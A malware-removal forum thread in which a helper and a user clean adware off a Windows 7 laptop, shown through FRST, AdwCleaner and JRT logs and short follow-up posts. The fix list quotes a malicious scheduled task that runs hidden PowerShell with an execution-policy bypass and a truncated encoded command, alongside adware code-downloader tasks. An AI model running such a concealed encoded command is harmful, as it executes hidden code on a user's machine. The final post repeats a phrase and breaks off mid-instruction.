BHO-x32: Plus-HD-1.2 -> {11111111-1111-1111-1111-110311121155} -> C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-bho.dll [2013-12-22] (Plus HD)
BHO-x32: llEsss2pay -> {A555676B-2A0B-9B19-8CC1-D4ED88AC8618} -> C:\ProgramData\llEsss2pay\GZ5hjc9kDO.dll [2014-04-22] ()
Toolbar: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
S2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService [X] <==== ATTENTION

Task: {377FBCA9-E775-4F65-9277-ED0882D40ED0} - System32\Tasks\Plus-HD-1.2-updater => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-updater.exe [2013-12-22] (Plus HD)
Task: {63F10999-1085-44F5-92F4-00E3050A14A6} - System32\Tasks\Plus-HD-1.2-chromeinstaller => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-chromeinstaller.exe [2013-12-22] (Plus HD)
Task: {6A0BBF0A-DE94-41FE-9157-FF8D9970AB11} - System32\Tasks\Plus-HD-1.2-firefoxinstaller => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-firefoxinstaller.exe [2013-12-22] (Plus HD)
Task: {AA72BE28-D781-4FCA-A97F-27CAA5C4187D} - System32\Tasks\LaunchSignup => C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe <==== ATTENTION
Task: {BAE3B976-BA97-4A8A-9EC4-2A9569AA4CAE} - System32\Tasks\Plus-HD-1.2-codedownloader => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-codedownloader.exe [2013-12-22] (Plus HD)
Task: {E7F157B8-18FC-44F8-9362-7CF6F27B0696} - System32\Tasks\Plus-HD-1.2-enabler => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-enabler.exe [2013-12-22] (Plus HD)
Task: {FA3683F2-5F9B-47D0-889A-09D8BFDDF1BE} - System32\Tasks\{B68E879D-FE0E-7106-2643-B9053FB27FCC} => C:\windows\system32\WindowsPowershell\v1.0\powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand IAA7ADsAOwA7ACAAOwA7ADsAOwAgACAAOwA7ACAAIAAgADsAOwAgACAAOwAgADsAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIA (the data entry h... (long line)
Task: {FA9233DD-423A-457F-BD31-003D43E5F021} - System32\Tasks\AmiUpdXp => C:\Users\Tech 14\AppData\Local\29033\Updater.exe [2016-07-17] (Emirates) <==== ATTENTION
Task: C:\windows\Tasks\AmiUpdXp.job => C:\Users\Tech 14\AppData\Local\29033\Updater.exe <==== ATTENTION
Task: C:\windows\Tasks\Plus-HD-1.2-chromeinstaller.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-chromeinstaller.exe/installcrx /crxinstalltype=0 /agentregpath='Plus-HD-1.2' /extensionfilepath C:\Program Files (x86)\Plus-HD-1.2\31255.crx' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installerfullversion=1.32.153.0 /installationtime=1387757473 /statsdoma... (long line)
Task: C:\windows\Tasks\Plus-HD-1.2-codedownloader.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-codedownloader.exe|/reinstallapp /agentregpath='Plus-HD-1.2' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installerfullversion=1.32.153.0 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /coded... (long line)
Task: C:\windows\Tasks\Plus-HD-1.2-enabler.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-enabler.exe?/enablebho /agentregpath='Plus-HD-1.2' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com <==== ATTENTION
Task: C:\windows\Tasks\Plus-HD-1.2-firefoxinstaller.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-firefoxinstaller.exe?/installxpi /agentregpath='Plus-HD-1.2' /extensionfilepath C:\Program Files (x86)\Plus-HD-1.2\31255.xpi' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installerfullversion=1.32.153.0 /installationtime=1387757473 /statsdomain=hxxp:/stats.... (long line)
Task: C:\windows\Tasks\Plus-HD-1.2-updater.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-updater.exe?/runupdater /agentregpath='Plus-HD-1.2' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /geoserviceurl=hxxp:/ipgeoapi.com/ /updatejsondomain=hx... (long line)
AlternateDataStreams: C:\ProgramData\TEMP:373E1720 [126]

C:\Windows\System32\Tasks\Plus-HD-1.2-updater
C:\Program Files (x86)\Plus-HD-1.2
C:\Windows\System32\Tasks\Plus-HD-1.2-chromeinstaller
C:\Windows\System32\Tasks\Plus-HD-1.2-firefoxinstaller
C:\Windows\System32\Tasks\LaunchSignup
C:\Program Files (x86)\MyPC Backup
C:\Windows\System32\Tasks\Plus-HD-1.2-codedownloader
C:\Windows\System32\Tasks\Plus-HD-1.2-enabler
C|Windows\System32\Tasks\{B68E879D-FE0E-7106-2643-B9053FB27FCC}
C:\windows\system32\WindowsPowershell\v1.0\powershell.exe
C\Windows\System32\Tasks\AmiUpdXp
C:\Users\Tech 14\AppData\Local\29033
C:\Windows\\Tasks\AmiUpdXp.job
C:\windows\Tasks\Plus-HD-1.2-chromeinstaller.job
C:\windows\Tasks\Plus-HD-1.2-codedownloader.job
C:\windows\Tasks\Plus-HD-1.2-enabler.job
C:\windows\Tasks\Plus-HD-1.2-firefoxinstaller.job
C:\windows\Tasks\Plus-HD-1.2-updater.job

C:\Program Files (x86)\Mobogenie
C:\Users\Tech 14\AppData\Roaming\newnext.me
C:\ProgramData\llEsss2pay
C:\ProgramData\llEsss2pay

End
*****************

Restore point was successfully created.
Processes closed successfully.
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\mobilegeni daemon" => removed successfully
"HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\Microsoft\Windows\CurrentVersion\Run\\NextLive" => removed successfully
"HKLM\SOFTWARE\Policies\Google" => removed successfully
HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}" => removed successfully
HKLM\Software\Classes\CLSID\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} => not found
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}" => removed successfully
HKLM\Software\Classes\CLSID\{2fa28606-de77-4029-af96-b231e3b8f827} => not found
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}" => removed successfully
HKLM\Software\Classes\CLSID\{b7fca997-d0fb-4fe0-8afd-255e89cf9671} => not found
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43}" => removed successfully
HKLM\Software\Classes\CLSID\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43} => not found
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}" => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{2fa28606-de77-4029-af96-b231e3b8f827} => not found
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}" => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{b7fca997-d0fb-4fe0-8afd-255e89cf9671} => not found
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43}" => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43} => not found
"HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully
"HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}" => removed successfully
HKLM\Software\Classes\CLSID\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} => not found
"HKU\S-1-5-21-893956484-597186715-3571521862-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully
"HKU\S-1-5-21-893956484-597186715-3571521862-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}" => removed successfully
HKLM\Software\Classes\CLSID\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} => not found
"HKU\S-1-5-21-893956484-597186715-3571521862-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}" => removed successfully
HKLM\Software\Classes\CLSID\{2fa28606-de77-4029-af96-b231e3b8f827} => not found
"HKU\S-1-5-21-893956484-597186715-3571521862-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}" => removed successfully
HKLM\Software\Classes\CLSID\{b7fca997-d0fb-4fe0-8afd-255e89cf9671} => not found
"HKU\S-1-5-21-893956484-597186715-3571521862-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43}" => removed successfully
HKLM\Software\Classes\CLSID\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43} => not found
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311121155}" => removed successfully
HKLM\Software\Classes\CLSID\{11111111-1111-1111-1111-110311121155} => not found
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A555676B-2A0B-9B19-8CC1-D4ED88AC8618} => not found
"HKLM\Software\Classes\CLSID\{A555676B-2A0B-9B19-8CC1-D4ED88AC8618}" => removed successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311121155}" => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{11111111-1111-1111-1111-110311121155} => not found
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A555676B-2A0B-9B19-8CC1-D4ED88AC8618} => not found
HKLM\Software\Wow6432Node\Classes\CLSID\{A555676B-2A0B-9B19-8CC1-D4ED88AC8618} => not found
"HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA}" => removed successfully
HKLM\Software\Classes\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => not found
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => removed successfully
"HKLM\System\CurrentControlSet\Services\pdfcDispatcher" => removed successfully
pdfcDispatcher => service removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{377FBCA9-E775-4F65-9277-ED0882D40ED0}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{377FBCA9-E775-4F65-9277-ED0882D40ED0}" => removed successfully
C:\windows\System32\Tasks\Plus-HD-1.2-updater => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Plus-HD-1.2-updater" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{63F10999-1085-44F5-92F4-00E3050A14A6}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{63F10999-1085-44F5-92F4-00E3050A14A6}" => removed successfully
C:\windows\System32\Tasks\Plus-HD-1.2-chromeinstaller => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Plus-HD-1.2-chromeinstaller" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6A0BBF0A-DE94-41FE-9157-FF8D9970AB11}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6A0BBF0A-DE94-41FE-9157-FF8D9970AB11}" => removed successfully
C:\windows\System32\Tasks\Plus-HD-1.2-firefoxinstaller => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Plus-HD-1.2-firefoxinstaller" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AA72BE28-D781-4FCA-A97F-27CAA5C4187D}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AA72BE28-D781-4FCA-A97F-27CAA5C4187D}" => removed successfully
C:\windows\System32\Tasks\LaunchSignup => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchSignup" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{BAE3B976-BA97-4A8A-9EC4-2A9569AA4CAE}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BAE3B976-BA97-4A8A-9EC4-2A9569AA4CAE}" => removed successfully
C:\windows\System32\Tasks\Plus-HD-1.2-codedownloader => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Plus-HD-1.2-codedownloader" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E7F157B8-18FC-44F8-9362-7CF6F27B0696}" => removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7F157B8-18FC-44F8-9362-7CF6F27B0696} => could not remove. Access Denied.
"C:\windows\System32\Tasks\Plus-HD-1.2-enabler" => not found
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Plus-HD-1.2-enabler => could not remove. Access Denied.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FA3683F2-5F9B-47D0-889A-09D8BFDDF1BE}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FA3683F2-5F9B-47D0-889A-09D8BFDDF1BE}" => removed successfully
C:\windows\System32\Tasks\{B68E879D-FE0E-7106-2643-B9053FB27FCC} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{B68E879D-FE0E-7106-2643-B9053FB27FCC}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{FA9233DD-423A-457F-BD31-003D43E5F021}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FA9233DD-423A-457F-BD31-003D43E5F021}" => removed successfully
C:\windows\System32\Tasks\AmiUpdXp => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AmiUpdXp" => removed successfully
"C:\windows\Tasks\AmiUpdXp.job" => not found
C:\windows\Tasks\Plus-HD-1.2-chromeinstaller.job => moved successfully
C:\windows\Tasks\Plus-HD-1.2-codedownloader.job => moved successfully
"C:\windows\Tasks\Plus-HD-1.2-enabler.job" => not found
C:\windows\Tasks\Plus-HD-1.2-firefoxinstaller.job => moved successfully
C:\windows\Tasks\Plus-HD-1.2-updater.job => moved successfully
C:\ProgramData\TEMP => ":373E1720" ADS removed successfully
"C:\Windows\System32\Tasks\Plus-HD-1.2-updater" => not found
"C:\Program Files (x86)\Plus-HD-1.2" => not found
"C:\Windows\System32\Tasks\Plus-HD-1.2-chromeinstaller" => not found
"C:\Windows\System32\Tasks\Plus-HD-1.2-firefoxinstaller" => not found
"C:\Windows\System32\Tasks\LaunchSignup" => not found
C:\Program Files (x86)\MyPC Backup => moved successfully
"C:\Windows\System32\Tasks\Plus-HD-1.2-codedownloader" => not found
"C:\Windows\System32\Tasks\Plus-HD-1.2-enabler" => not found
C|Windows\System32\Tasks\{B68E879D-FE0E-7106-2643-B9053FB27FCC} => Error: No automatic fix found for this entry.
C:\windows\system32\WindowsPowershell\v1.0\powershell.exe => moved successfully
C\Windows\System32\Tasks\AmiUpdXp => Error: No automatic fix found for this entry.
"C:\Users\Tech 14\AppData\Local\29033" => not found
"C:\Windows\\Tasks\AmiUpdXp.job" => not found
"C:\windows\Tasks\Plus-HD-1.2-chromeinstaller.job" => not found
"C:\windows\Tasks\Plus-HD-1.2-codedownloader.job" => not found
"C:\windows\Tasks\Plus-HD-1.2-enabler.job" => not found
"C:\windows\Tasks\Plus-HD-1.2-firefoxinstaller.job" => not found
"C:\windows\Tasks\Plus-HD-1.2-updater.job" => not found
"C:\Program Files (x86)\Mobogenie" => not found
C:\Users\Tech 14\AppData\Roaming\newnext.me => moved successfully
C:\ProgramData\llEsss2pay => moved successfully
"C:\ProgramData\llEsss2pay" => not found

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 14378684 B
Java, Flash, Steam htmlcache => 6619 B
Windows/system/drivers => 555801277 B
Edge => 0 B
Chrome => 14659793 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 42305567 B
systemprofile32 => 115380 B
LocalService => 0 B
NetworkService => 278211578 B
Tech 14 => 897346840 B

RecycleBin => 0 B
EmptyTemp: => 1.7 GB temporary data Removed.

================================

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 23-03-2018 22:06:39)


Result of scheduled keys to remove after reboot:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7F157B8-18FC-44F8-9362-7CF6F27B0696} => could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Plus-HD-1.2-enabler => could not remove. Access Denied.

==== End of Fixlog 22:06:39 ====

 

 

 

# AdwCleaner 7.0.8.0 - Logfile created on Sat Mar 24 02:31:34 2018
# Updated on 2018/08/02 by Malwarebytes
# Running on Windows 7 Home Premium (X64)
# Mode: clean
# Support: https://www.malwarebytes.com/support

***** [ Services ] *****

No malicious services deleted.

***** [ Folders ] *****

Deleted: C:\Users\Tech 14\AppData\Local\Mobogenie
Deleted: C:\Users\Tech 14\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mobogenie
Deleted: C:\Users\Tech 14\Documents\Mobogenie
Deleted: C:\Users\Tech 14\AppData\Local\genienext
Deleted: C:\Users\Tech 14\AppData\Local\apn
Deleted: C:\Users\Tech 14\AppData\Local\SwvUpdater
Deleted: C:\ProgramData\5c8acd7ea0d02786
Deleted: C:\ProgramData\{0a376664-50c8-0}
Deleted: C:\ProgramData\{0b6c3ba4-10c8-1}


***** [ Files ] *****

Deleted: C:\Users\Tech 14\daemonprocess.txt


***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks deleted.

***** [ Registry ] *****

Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cloudfront.net
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cmptch.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\coupontime.co
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ddts0bzupd01y.cloudfront.net
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\foxi180_f.tlscdn.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\foxi69.tlscdn.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\pricepeep.net
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\static.cmptch.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\static.coupontime00.coupontime.co
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\static.pricepeep00.pricepeep.net
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\superfish.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\tlscdn.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\utop.it
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\www.superfish.com
Deleted: [Key] - HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Deleted: [Key] - HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\InstalledBrowserExtensions
Deleted: [Key] - HKCU\Software\InstalledBrowserExtensions
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{67BD9EEB-AA06-4329-A940-D250019300C9}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{9EDC0C90-2B5B-4512-953E-35767BAD5C67}
Deleted: [Key] - HKLM\SOFTWARE\Classes\TypeLib\{A0EE0278-2986-4E5A-884E-A3BF0357E476}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{D879A501-50A7-BEFC-A4C5-32DC6E0CB208}
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MobogenieAdd
Deleted: [Key] - HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\AppDataLow\Software\Crossrider
Deleted: [Key] - HKCU\Software\AppDataLow\Software\Crossrider
Deleted: [Key] - HKLM\SOFTWARE\DomaIQ
Deleted: [Key] - HKLM\SOFTWARE\{1146AC44-2F03-4431-B4FD-889BC837521F}
Deleted: [Key] - HKU\.DEFAULT\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Deleted: [Key] - HKU\S-1-5-19\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Deleted: [Key] - HKU\S-1-5-20\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Deleted: [Key] - HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Deleted: [Key] - HKU\S-1-5-18\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Deleted: [Key] - HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Deleted: [Key] - HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Deleted: [Key] - HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\AppDataLow\Software\Crossrider
Deleted: [Key] - HKCU\Software\AppDataLow\Software\Crossrider
Deleted: [Key] - HKLM\SOFTWARE\Classes\CrossriderApp0031255.BHO
Deleted: [Key] - HKLM\SOFTWARE\Classes\CrossriderApp0031255.BHO.1
Deleted: [Key] - HKLM\SOFTWARE\Classes\CrossriderApp0031255.Sandbox
Deleted: [Key] - HKLM\SOFTWARE\Classes\CrossriderApp0031255.Sandbox.1
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{89d2eaeb-aa55-4195-93be-28477ff9493a}


***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries deleted.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries deleted.

*************************

::Tracing keys deleted
::Winsock settings cleared
::Additional Actions: 0



*************************

C:/AdwCleaner/AdwCleaner[S0].txt - [5788 B] - [2018/3/24 2:21:58]


########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt ##########

 

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.4 (07.09.2017)
Operating System: Windows 7 Home Premium x64
Ran by Tech 14 (Administrator) on Fri 03/23/2018 at 22:52:53.83
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 6

Successfully deleted: C:\Users\Tech 14\AppData\Local\{C0B2B26F-F0C4-412A-9273-A0A4AF11DCF1} (Empty Folder)
Successfully deleted: C:\Users\Tech 14\Documents\optimizer pro (Folder)
Successfully deleted: C:\windows\SysWOW64\sho2CBB.tmp (File)
Successfully deleted: C:\windows\SysWOW64\sho68B1.tmp (File)
Successfully deleted: C:\windows\SysWOW64\shoAC84.tmp (File)
Successfully deleted: C:\windows\SysWOW64\shoF2A3.tmp (File)



Registry: 2

Successfully deleted: HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} (Registry Key)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} (Registry Key)




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Fri 03/23/2018 at 23:06:32.47
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



#4 nasdaq

nasdaq

  • Malware Response Team
  • 38,580 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:06:56 AM

Posted 25 March 2018 - 12:35 PM

Hi,

I could not uninstall

llEsss2pay (HKLM-x32\...\{82B558C7-2A69-D3D5-B65A-DCAB3B65AD02}) (Version: - less2pay)


The fix took care of the BHO's the running processes etc.

Any remaining issues with this computer?

#5 starblazers

starblazers
  • Topic Starter

  • Members
  • 56 posts
  • OFFLINE
  •  
  • Local time:06:56 AM

Posted 26 March 2018 - 09:41 PM

Right now, it appears to be behaving itself.

And I just spotted your earlier question from your first reply.  No, I have no idea what that IP address was, I didn't recognize it.

 

Also, I have created a new Administrator account for the laptop.  Would it be safe to erase the old one, or would I potentially need it to access certain programs that may not be available to my new account?



#6 nasdaq

nasdaq

  • Malware Response Team
  • 38,580 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:06:56 AM

Posted 27 March 2018 - 07:46 AM

Hi,
 

Also, I have created a new Administrator account for the laptop. Would it be safe to erase the old one, or would I potentially need it to access certain programs that may not be available to my new account?


I would work in the new profile for a month or two. If all you the programs you use are working well then delete the old profile if you wish.
How to:
https://superuser.com/questions/63017/how-do-i-delete-a-user-profile-on-a-windows-7-machine-that-is-part-of-a-domain

===
 

No, I have no idea what that IP address was, I didn't recognize it.

More information on this IP.
https://www.bloomberg.com/research/stocks/private/snapshot.asp?privcapId=926617

If you wish to remove it run this fix.

Press the windows key Press the Windows key + r on your keyboard at the same time. This will open the RUN BOX.+ r on your keyboard at the same time. This will open the RUN BOX.
